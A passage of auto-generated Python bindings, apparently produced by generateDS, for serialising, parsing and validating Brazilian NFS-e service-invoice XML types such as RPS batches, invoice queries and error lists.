outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotaConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
# end class tpNotaConsultaNFSe
class tpRPSsConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, RPS=None):
self.original_tagname_ = None
if RPS is None:
self.RPS = []
else:
self.RPS = RPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPSsConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPSsConsultaNFSe.subclass:
return tpRPSsConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpRPSsConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.RPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPSsConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPSsConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPSsConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPSsConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPSsConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPSsConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for RPS_ in self.RPS:
RPS_.export(outfile, level, namespace_, name_='RPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'RPS':
obj_ = tpRPSConsultaNFSe.factory()
obj_.build(child_)
self.RPS.append(obj_)
obj_.original_tagname_ = 'RPS'
# end class tpRPSsConsultaNFSe
class tpRPSConsultaNFSe(GeneratedsSuper):
"""Tipo Detalhes do RPSSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroRPS=None, SeriePrestacao=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPSConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPSConsultaNFSe.subclass:
return tpRPSConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpRPSConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroRPS is not None or
self.SeriePrestacao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPSConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPSConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPSConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPSConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPSConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPSConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
# end class tpRPSConsultaNFSe
class tpListaDetalhesConsultaRPS(GeneratedsSuper):
"""Lista de Detalhes da Consulta RPS"""
subclass = None
superclass = None
def __init__(self, Detalhe=None):
self.original_tagname_ = None
if Detalhe is None:
self.Detalhe = []
else:
self.Detalhe = Detalhe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaDetalhesConsultaRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaDetalhesConsultaRPS.subclass:
return tpListaDetalhesConsultaRPS.subclass(*args_, **kwargs_)
else:
return tpListaDetalhesConsultaRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Detalhe
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaDetalhesConsultaRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaDetalhesConsultaRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Detalhe_ in self.Detalhe:
Detalhe_.export(outfile, level, namespace_, name_='Detalhe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Detalhe':
obj_ = tpDetalhesConsultaRPS.factory()
obj_.build(child_)
self.Detalhe.append(obj_)
obj_.original_tagname_ = 'Detalhe'
# end class tpListaDetalhesConsultaRPS
class tpListaErros(GeneratedsSuper):
"""Erros."""
subclass = None
superclass = None
def __init__(self, Erro=None):
self.original_tagname_ = None
if Erro is None:
self.Erro = []
else:
self.Erro = Erro
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaErros)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaErros.subclass:
return tpListaErros.subclass(*args_, **kwargs_)
else:
return tpListaErros(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Erro
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaErros', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaErros')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaErros')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaErros', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaErros'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaErros', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Erro_ in self.Erro:
Erro_.export(outfile, level, namespace_, name_='Erro', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Erro':
obj_ = tpEvento.factory()
obj_.build(child_)
self.Erro.append(obj_)
obj_.original_tagname_ = 'Erro'
# end class tpListaErros
class tpListaItens(GeneratedsSuper):
"""Itens de Serviço."""
subclass = None
superclass = None
def __init__(self, Item=None):
self.original_tagname_ = None
if Item is None:
self.Item = []
else:
self.Item = Item
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaItens)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaItens.subclass:
return tpListaItens.subclass(*args_, **kwargs_)
else:
return tpListaItens(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Item
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaItens', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaItens')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaItens')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaItens', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaItens'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaItens', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Item_ in self.Item:
Item_.export(outfile, level, namespace_, name_='Item', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Item':
obj_ = tpItens.factory()
obj_.build(child_)
self.Item.append(obj_)
obj_.original_tagname_ = 'Item'
# end class tpListaItens
class tpListaNFSeRPS(GeneratedsSuper):
"""NFSE e seu respectivo RPS"""
subclass = None
superclass = None
def __init__(self, ChaveNFSeRPS=None):
self.original_tagname_ = None
if ChaveNFSeRPS is None:
self.ChaveNFSeRPS = []
else:
self.ChaveNFSeRPS = ChaveNFSeRPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSeRPS.subclass:
return tpListaNFSeRPS.subclass(*args_, **kwargs_)
else:
return tpListaNFSeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ChaveNFSeRPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for ChaveNFSeRPS_ in self.ChaveNFSeRPS:
ChaveNFSeRPS_.export(outfile, level, namespace_, name_='ChaveNFSeRPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ChaveNFSeRPS':
obj_ = tpChaveNFeRPS.factory()
obj_.build(child_)
self.ChaveNFSeRPS.append(obj_)
obj_.original_tagname_ = 'ChaveNFSeRPS'
# end class tpListaNFSeRPS
class tpListaNFSe(GeneratedsSuper):
"""Lista de NFSE consultada"""
subclass = None
superclass = None
def __init__(self, ConsultaNFSe=None):
self.original_tagname_ = None
if ConsultaNFSe is None:
self.ConsultaNFSe = []
else:
self.ConsultaNFSe = ConsultaNFSe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSe.subclass:
return tpListaNFSe.subclass(*args_, **kwargs_)
else:
return tpListaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ConsultaNFSe
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for ConsultaNFSe_ in self.ConsultaNFSe:
ConsultaNFSe_.export(outfile, level, namespace_, name_='ConsultaNFSe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ConsultaNFSe':
obj_ = tpConsultaNFSe.factory()
obj_.build(child_)
self.ConsultaNFSe.append(obj_)
obj_.original_tagname_ = 'ConsultaNFSe'
# end class tpListaNFSe
class tpListaNFSeConsultaNota(GeneratedsSuper):
"""Lista de NFSE consultada"""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaNFSeConsultaNota)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaNFSeConsultaNota.subclass:
return tpListaNFSeConsultaNota.subclass(*args_, **kwargs_)
else:
return tpListaNFSeConsultaNota(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeConsultaNota', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaNFSeConsultaNota')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaNFSeConsultaNota')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaNFSeConsultaNota', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaNFSeConsultaNota'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaNFSeConsultaNota', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpListaNFSeConsultaNota
class tpLote(GeneratedsSuper):
"""Lote de RPS"""
subclass = None
superclass = None
def __init__(self, Id=None, RPS=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
if RPS is None:
self.RPS = []
else:
self.RPS = RPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLote)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLote.subclass:
return tpLote.subclass(*args_, **kwargs_)
else:
return tpLote(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.RPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLote', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLote')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLote')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLote', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLote'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLote', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for RPS_ in self.RPS:
RPS_.export(outfile, level, namespace_, name_='RPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'RPS':
obj_ = tpRPS.factory()
obj_.build(child_)
self.RPS.append(obj_)
obj_.original_tagname_ = 'RPS'
# end class tpLote
class tpNFSe(GeneratedsSuper):
"""Tipo que representa uma NFSe"""
subclass = None
superclass = None
def __init__(self, NumeroNota=None, DataProcessamento=None, NumeroLote=None, CodigoVerificacao=None, Assinatura=None, InscricaoMunicipalPrestador=None, RazaoSocialPrestador=None, TipoRPS=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, SituacaoRPS=None, SerieRPSSubstituido=None, NumeroRPSSubstituido=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None, SeriePrestacao=None, InscricaoMunicipalTomador=None, CPFCNPJTomador=None, RazaoSocialTomador=None, DocTomadorEstrangeiro=None, TipoLogradouroTomador=None, LogradouroTomador=None, NumeroEnderecoTomador=None, ComplementoEnderecoTomador=None, TipoBairroTomador=None, BairroTomador=None, CidadeTomador=None, CidadeTomadorDescricao=None, CEPTomador=None, EmailTomador=None, CodigoAtividade=None, AliquotaAtividade=None, TipoRecolhimento=None, MunicipioPrestacao=None, MunicipioPrestacaoDescricao=None, Operacao=None, Tributacao=None, ValorPIS=None, ValorCOFINS=None, ValorINSS=None, ValorIR=None, ValorCSLL=None, AliquotaPIS=None, AliquotaCOFINS=None, AliquotaINSS=None, AliquotaIR=None, AliquotaCSLL=None, DescricaoRPS=None, 